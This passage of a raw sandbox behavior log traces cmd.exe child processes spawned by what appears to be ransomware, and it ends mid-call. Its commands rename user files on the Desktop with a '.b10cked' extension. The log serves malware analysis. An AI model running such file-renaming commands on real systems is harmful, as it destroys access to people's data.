38 [0231.561] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 
[0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0231.563] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0231.563] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2=".") returned 67 [0231.563] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2="..") returned 67 [0231.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP" (normalized: 
"c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz~1.bmp")) returned 0x20 [0231.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x231e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.563] SetErrorMode (uMode=0x0) returned 0x0 [0231.563] SetErrorMode (uMode=0x1) returned 0x0 [0231.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", nBufferLength=0x104, lpBuffer=0x18eb4c, lpFilePart=0x18eb34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", lpFilePart=0x18eb34*="Q--QNZ~1.BMP") returned 0x33 [0231.563] SetErrorMode (uMode=0x0) returned 0x1 [0231.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x12 [0231.564] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2=".") returned 67 [0231.564] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2="..") returned 67 [0231.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz~1.bmp")) returned 0x20 [0231.564] SetErrorMode (uMode=0x0) returned 0x0 [0231.564] SetErrorMode (uMode=0x1) returned 0x0 [0231.564] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", nBufferLength=0x104, lpBuffer=0x18efc8, lpFilePart=0x18ed60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", lpFilePart=0x18ed60*="Q--QNZ~1.BMP") returned 0x33 [0231.564] SetErrorMode (uMode=0x0) returned 0x1 [0231.564] SetErrorMode (uMode=0x0) returned 0x0 [0231.564] SetErrorMode (uMode=0x1) returned 0x0 [0231.564] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x18f1d0, lpFilePart=0x18ed60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", lpFilePart=0x18ed60*="Q--qnZ17d.bmp.b10cked") 
returned 0x3c [0231.564] SetErrorMode (uMode=0x0) returned 0x1 [0231.564] SetLastError (dwErrCode=0x0) [0231.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp.b10cked")) returned 0xffffffff [0231.564] GetLastError () returned 0x2 [0231.564] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x18e6dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6dc) returned 0x220ef0 [0231.565] FindNextFileW (in: hFindFile=0x220ef0, lpFindFileData=0x18e6dc | out: lpFindFileData=0x18e6dc) returned 0 [0231.565] GetLastError () returned 0x12 [0231.565] FindClose (in: hFindFile=0x220ef0 | out: hFindFile=0x220ef0) returned 1 [0231.566] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x231c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x231c30) returned 0x220ef0 [0231.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x18e974, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", lpFilePart=0x0) returned 0x3c [0231.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp", nBufferLength=0x104, lpBuffer=0x18e974, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp", lpFilePart=0x0) returned 0x34 [0231.567] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp")) returned 0x20 [0231.567] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp" (normalized: 
"c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp.b10cked"), dwFlags=0x3) returned 1 [0231.567] FindClose (in: hFindFile=0x220ef0 | out: hFindFile=0x220ef0) returned 1 [0231.568] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e928 | out: _Buffer=" 1") returned 9 [0231.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.568] GetFileType (hFile=0x7) returned 0x2 [0231.606] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.606] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8b4 | out: lpMode=0x18e8b4) returned 1 [0231.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8e8 | out: lpConsoleScreenBufferInfo=0x18e8e8) returned 1 [0231.607] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0231.608] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e928 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0231.608] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e90c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e90c*=0x1a) returned 1 [0231.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.609] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.609] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: 
lpMode=0x4a9e41b0) returned 1 [0231.609] SetConsoleInputExeNameW () returned 0x1 [0231.609] GetConsoleOutputCP () returned 0x1b5 [0231.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.609] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.609] exit (_Code=0) Process: id = "610" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b20" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34378 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34379 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe") Region: id = 34380 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34381 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34382 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34383 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34384 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34567 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34568 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34569 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34570 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 34571 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 34572 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 34573 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34574 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34575 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34576 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34577 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34578 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34579 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34580 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34679 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 34680 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34681 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34682 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34683 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34684 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 34685 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34686 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 34687 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 34688 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 848 os_tid = 0xf98 [0231.843] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16feec | out: lpSystemTimeAsFileTime=0x16feec*(dwLowDateTime=0xbdbf5a40, dwHighDateTime=0x1d440a9)) [0231.843] GetCurrentProcessId () returned 0x930 [0231.843] GetCurrentThreadId () returned 0xf98 [0231.843] GetTickCount () returned 0x3fcc5 [0231.843] QueryPerformanceCounter (in: lpPerformanceCount=0x16fee4 | out: lpPerformanceCount=0x16fee4*=28863254111) returned 1 [0231.844] GetModuleHandleA (lpModuleName=0x0) returned 
0x4a9c0000 [0231.844] __set_app_type (_Type=0x1) [0231.844] __p__fmode () returned 0x76b331f4 [0231.844] __p__commode () returned 0x76b331fc [0231.844] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.844] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.845] GetCurrentThreadId () returned 0xf98 [0231.845] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf98) returned 0x38 [0231.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.845] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.845] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.920] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.920] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fe7c | out: phkResult=0x16fe7c*=0x0) returned 0x2 [0231.920] VirtualQuery (in: lpAddress=0x16feb3, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fe4c, dwLength=0x1c | out: 
lpBuffer=0x16fe4c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.920] GetConsoleOutputCP () returned 0x1b5 [0231.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.923] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.923] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.923] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.931] GetEnvironmentStringsW () returned 0x280168* [0231.931] FreeEnvironmentStringsW (penv=0x280168) returned 1 [0231.931] GetEnvironmentStringsW () returned 0x280168* [0231.931] FreeEnvironmentStringsW (penv=0x280168) returned 1 [0231.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edec | out: phkResult=0x16edec*=0x40) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x90, 
lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x0, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegCloseKey (hKey=0x40) returned 0x0 [0231.932] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edec | out: phkResult=0x16edec*=0x40) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x0, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x9, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x9, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x9, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegCloseKey (hKey=0x40) returned 0x0 [0231.932] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.932] srand (_Seed=0x5b8863bf) [0231.932] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"" [0231.932] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"" [0231.932] GetCurrentDirectoryW (in: nBufferLength=0x104, 
